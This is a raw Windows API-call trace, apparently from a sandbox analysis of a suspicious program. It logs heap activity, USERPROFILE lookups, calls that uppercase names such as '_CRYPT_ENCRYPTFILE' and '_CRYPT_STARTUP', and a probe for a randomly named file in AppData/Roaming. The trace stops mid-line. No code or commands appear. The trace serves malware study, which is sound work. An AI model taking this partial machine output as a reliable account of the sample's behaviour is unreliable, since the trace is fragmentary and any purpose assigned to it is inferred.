[0225.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0225.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0225.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0225.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0225.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0225.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0225.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0225.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0225.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0225.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0225.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0225.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0225.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0225.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0225.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0225.289] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0225.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0225.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0225.289] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0225.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0225.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0225.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0225.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0225.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0225.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0225.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0225.361] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0225.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0225.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0225.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0225.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0225.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0225.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0225.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0225.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0225.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0225.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0225.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0225.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0225.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0225.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0225.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0225.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0225.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0225.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0225.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0225.362] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0225.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0225.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0225.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0225.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0225.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0225.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0225.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0225.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0225.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0225.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0225.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0225.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0225.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0225.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0225.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0225.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0225.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0225.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0225.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0225.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0225.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0225.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0225.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0225.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50500 [0225.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0225.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0225.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0225.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0225.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0225.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0225.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0225.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0225.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0225.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0225.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0225.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0225.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0225.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0225.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0225.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0225.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0225.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0225.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0225.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0225.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0225.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0225.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0225.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0225.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0225.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0225.364] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0225.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0225.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0225.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0225.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0225.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0225.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0225.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0225.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0225.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0225.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0225.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0225.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0225.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0225.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0225.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0225.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0225.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0225.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0225.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0225.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0225.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0225.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0225.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0225.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0225.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0225.365] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0225.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0225.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0225.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0225.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0225.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0225.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0225.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0225.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0225.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0225.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0225.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0225.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0225.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0225.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0225.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0225.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0225.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0225.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0225.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0225.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0225.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0225.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0225.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0225.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0225.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0225.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0225.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0225.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0225.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0225.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0225.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0225.366] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0225.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0225.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0225.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0225.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0225.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0225.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0225.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0225.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0225.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0225.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0225.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0225.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0225.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0225.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0225.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0225.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0225.367] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0225.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0225.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0225.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0225.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0225.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0225.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0225.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0225.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0225.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0225.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0225.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0225.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0225.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0225.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0225.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0225.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0225.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0225.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0225.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0225.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0225.367] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/bfVxZ90.avi", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9914c70, ftCreationTime.dwHighDateTime=0x1d5e76a, ftLastAccessTime.dwLowDateTime=0xcfd04670, ftLastAccessTime.dwHighDateTime=0x1d5f054, ftLastWriteTime.dwLowDateTime=0xcfd04670, ftLastWriteTime.dwHighDateTime=0x1d5f054, nFileSizeHigh=0x0, nFileSizeLow=0x2317, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="bfVxZ90.avi", cAlternateFileName="")) returned 0xa87050 [0225.368] FindClose (in: hFindFile=0xa87050 | out: hFindFile=0xa87050) returned 1 [0225.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0225.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0225.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0225.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0225.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0225.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0225.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0225.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0225.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0225.368] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0225.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0225.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0225.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0225.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0225.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0225.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0225.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0225.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0225.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0225.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0225.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0225.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0225.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0225.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0225.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0225.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0225.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0225.369] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0225.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0225.369] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0225.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0225.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0225.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0225.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0225.369] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0225.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0225.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0225.369] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0225.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0225.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0225.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0225.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 